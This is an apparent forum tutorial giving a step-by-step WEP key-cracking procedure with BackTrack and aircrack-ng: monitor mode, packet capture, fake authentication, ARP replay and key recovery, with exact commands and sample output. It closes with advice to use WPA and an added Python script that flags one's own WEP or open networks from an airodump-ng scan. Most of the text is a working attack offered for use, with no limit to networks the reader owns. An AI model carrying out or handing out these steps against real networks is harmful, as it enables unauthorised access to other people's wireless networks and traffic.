Things you need:
-Backtrack 3 or 4
-A wireless network interface card that can inject packets. Most built-in wireless cards sold in Singapore do not have this ability; you need to buy one that does.
You can get one for around $30 at Sim Lim. With a USB wireless card you can do all of this inside VMware.
Use the TP-LINK TL-WN321G if you don't know which to buy. I have tested with it and it is working well.
-A router to attack.
Steps:
-Boot up your PC with BackTrack.
-Plug in your USB wireless card.
-Open two terminal consoles.
-For now we will use just one console. Enter the "iwconfig" command and check whether your wireless card is detected. Unplug it and plug it back in to see the difference. You should see something like rausb0; the name differs between cards.
-rausb0 is your wireless card's interface name in BackTrack; you will need it a lot.
-Now start your wireless card (this puts it into monitor mode) with this command: "airmon-ng start rausb0"
-Now run "airodump-ng rausb0". This scans for all available access points; you will see your router's name and MAC address. Note them down.
-You can stop scanning with Ctrl-C.
-First we need to collect packets from the router. Use this command: "airodump-ng -c 6 --bssid <your router MAC address> -w output rausb0" (-c 6 selects channel 6; use the channel the scan showed for your router)
You should see something like this:
    [CH 6 ][ Elapsed: 1 mins ][ <date and time> ]
    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    <your MAC address> 42 100 5240 10 338 9 54 WEP WEP <your router name>
-#Data is the number you need to collect. To boost it, we need to do the next step.
-Now go to your other terminal and issue this command to do a fake authentication with the access point: "aireplay-ng -1 0 -e <your router name> -a <your router MAC> -h <your wireless card MAC> rausb0". You can find your wireless MAC address printed on the USB card itself; if not, run "ifconfig -a" and look at the HWaddr.
You should get this:
    18:18:20 Sending Authentication Request
    18:18:20 Authentication successful
    18:18:20 Sending Association Request
    18:18:20 Association successful :-)
-After successful authentication, use this command for ARP request replay: "aireplay-ng -3 -b <your router MAC> -h <your own wireless MAC addr> rausb0". This helps a lot in collecting data. You should see something like:
    Saving ARP requests in replay_arp-0321-191525.cap
    You should also start airodump-ng to capture replies.
    Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
-Now, to crack the WEP key, use this command: "aircrack-ng -b <your router MAC> output*.cap"
You should get the WEP key =)
All 2Wire default WEP passwords are crackable.
Lesson of the day: use WPA with a strong password. WEP can be cracked completely in less than 15 minutes.
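As an added example (not part of the original post, and not aircrack-ng's own code), here is a small Python script that reads the CSV file airodump-ng writes next to the .cap when you pass "-w output" (output-01.csv) and lists which of your own access points still run WEP or no encryption, so you know which ones to move to WPA. The sample rows are constructed to match the airodump-ng CSV column order; the function names are my own.

```python
"""Audit an airodump-ng CSV (written alongside the .cap by -w) for WEP/open networks."""

# Constructed sample in the layout airodump-ng writes to output-01.csv; all values are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-03-21 19:10:01, 2009-03-21 19:15:25, 6, 54, WEP, WEP, , 42, 5240, 316283, 0. 0. 0. 0, 8, HomeWEP1, 
AA:BB:CC:DD:EE:FF, 2009-03-21 19:10:03, 2009-03-21 19:15:20, 11, 54, WPA2, CCMP, PSK, 60, 3100, 0, 0. 0. 0. 0, 6, Office, 
12:34:56:78:9A:BC, 2009-03-21 19:10:05, 2009-03-21 19:14:59, 1, 54, OPN, , , 75, 2200, 0, 0. 0. 0. 0, 9, Cafe,Free, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:AA:BB, 2009-03-21 19:11:00, 2009-03-21 19:15:25, 50, 210955, 00:11:22:33:44:55, 
"""


def parse_access_points(text):
    """Return one dict per access-point row; parsing stops at the station section."""
    aps = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(",")]
        if len(parts) < 15 or parts[0] in ("BSSID", "Station MAC"):
            if parts[0] == "Station MAC":
                break  # the rest of the file lists clients, not access points
            continue  # header row or blank separator line
        # ESSID is field 14 but is not quoted, so an ESSID containing commas spills
        # into extra fields; Key is always the last field, so join everything between.
        aps.append({
            "bssid": parts[0], "channel": parts[3], "privacy": parts[5],
            "cipher": parts[6], "auth": parts[7], "ivs": int(parts[10]),
            "essid": ",".join(parts[13:-1]),
        })
    return aps


def weak_networks(aps):
    """Flag access points that should be migrated to WPA2 (or WPA3)."""
    findings = []
    for ap in aps:
        if "WEP" in ap["privacy"]:
            findings.append((ap["bssid"], ap["essid"],
                             "WEP: key recoverable from captured IVs (%d seen), replace with WPA2" % ap["ivs"]))
        elif ap["privacy"] == "OPN":
            findings.append((ap["bssid"], ap["essid"], "open network: no encryption at all"))
    return findings


if __name__ == "__main__":
    for bssid, essid, why in weak_networks(parse_access_points(SAMPLE_CSV)):
        print("%s  %-12s %s" % (bssid, essid, why))
```

Replace SAMPLE_CSV with the contents of your own output-01.csv to audit a real scan.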
Feel free to ask questions if you get stuck at any part or if I have made any error in the tutorial.